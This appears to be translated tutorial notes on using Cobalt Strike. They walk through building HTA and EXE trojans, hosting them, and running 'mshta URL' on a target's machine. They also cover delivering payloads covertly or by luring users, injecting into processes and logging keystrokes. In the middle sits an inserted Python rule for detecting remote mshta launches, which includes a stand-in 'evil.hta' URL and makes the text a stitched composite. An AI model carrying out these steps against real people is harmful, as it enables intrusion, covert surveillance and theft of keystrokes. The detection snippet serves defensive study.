1. Penetration testing tools
I. CobaltStrike
Abbreviated as CS. It is built on a distributed (team server / client) architecture, so it supports both single-operator and team work, and is easy to use. (It has good support for Windows targets; Linux targets require an additional plug-in.)
Starting and using CS
In this walkthrough CS is started on a Linux system, so download CS on Linux; version 4.5 or later is preferable, as it is more convenient to use.
1. Start the team server
Use the cd command to enter the CS folder, then run the command
sudo ./teamserver ip password
where ip is your own machine's IP address and password is a password you choose yourself.
2. Start the client and connect
Open another command-line window, enter the CS folder, and run
sudo ./cobaltstrike
A login window appears; enter the password you just defined to log in.
3. Building the Trojan program:
Two forms of Trojan: HTA and EXE
HTA
1. Create a listener:
The listener receives the connection from the target machine and handles the follow-up operations on it.
Cobalt Strike -> Listeners -> create a listener and give it a name
2. Create the HTA Trojan program
HTA stands for HTML Application; here it is a malicious HTML application.
When creating the HTA, select the listener created above and save the file locally.
Attacks -> Packages -> HTML Application
3. File hosting
Host the HTA as a file, which generates a URL for it.
Attacks -> Web Drive-by -> Host File
4. The URL can then be run from a command-line window on another person's machine:
mshta URL
If input of the mshta command is restricted, the restriction can be bypassed.
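As an added example (not from the original note), the defender's counterpart to the mshta step above: detection logic that flags process-creation events in which mshta.exe is launched with a remote http/https URL argument, run over constructed sample events in a hypothetical key=value log format.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (not real telemetry), written in
# an assumed "key=value" line format with quoted values where spaces occur.
SAMPLE_EVENTS = [
    'host=ws01 parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\mshta.exe '
    'cmdline="mshta.exe http://192.0.2.10/evil.hta"',
    'host=ws01 parent=C:\\Windows\\System32\\cmd.exe image=C:\\Windows\\System32\\mshta.exe '
    'cmdline="mshta https://example.test/update.hta"',
    'host=ws02 parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\mshta.exe '
    'cmdline="mshta.exe C:\\Tools\\local_app.hta"',
    'host=ws02 parent="C:\\Program Files\\App\\app.exe" image=C:\\Windows\\System32\\notepad.exe '
    'cmdline="notepad.exe readme.txt"',
    'host=ws03 parent=C:\\Windows\\System32\\cmd.exe image=C:\\Windows\\System32\\mshta.exe '
    'cmdline="mshta.exe"',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Split one key=value event line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def is_remote_hta_launch(event):
    """True when mshta.exe is started with a remote http/https URL argument.

    Fetching and executing an HTA from a URL is the delivery pattern the note
    describes; a local .hta path is not flagged by this rule.
    """
    image = event.get("image", "").lower()
    if not (image.endswith("\\mshta.exe") or image == "mshta.exe"):
        return False
    args = event.get("cmdline", "").split()[1:]  # drop the program name
    return any(urlparse(a).scheme.lower() in ("http", "https") for a in args)


def find_remote_hta_launches(lines):
    """Return (host, cmdline) pairs for every event the rule flags."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_remote_hta_launch(ev):
            hits.append((ev.get("host"), ev.get("cmdline")))
    return hits


if __name__ == "__main__":
    for host, cmd in find_remote_hta_launches(SAMPLE_EVENTS):
        print(f"ALERT {host}: {cmd}")
```

Only the two events that fetch an HTA over http/https are reported; the local-file launch and the bare mshta.exe start are left alone.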
EXE
1. Create an EXE Trojan program
Attacks -> Packages -> E, then select the listener and choose Windows EXE as the output format.
Once the target user runs the exe file, the machine is under monitoring.
2. Delivery methods
By force;
Stealthily;
Inducing the user to click and download it by hosting it on an HTTP service.
3. Injecting into other applications
After the machine is under monitoring, right-click -> Explore -> port scan.
Open all ports in use in order to piggyback the Trojan into other programs.
Click a port, then click the inject button to inject; this gives monitoring of that program.
Then click Log Keystrokes (keyboard recording) and then View -> Keystrokes; a keylogging window pops up. Whenever the target machine's keyboard is used, the window records the keys pressed.
4. Port scanning
Can discover all IP addresses on the LAN.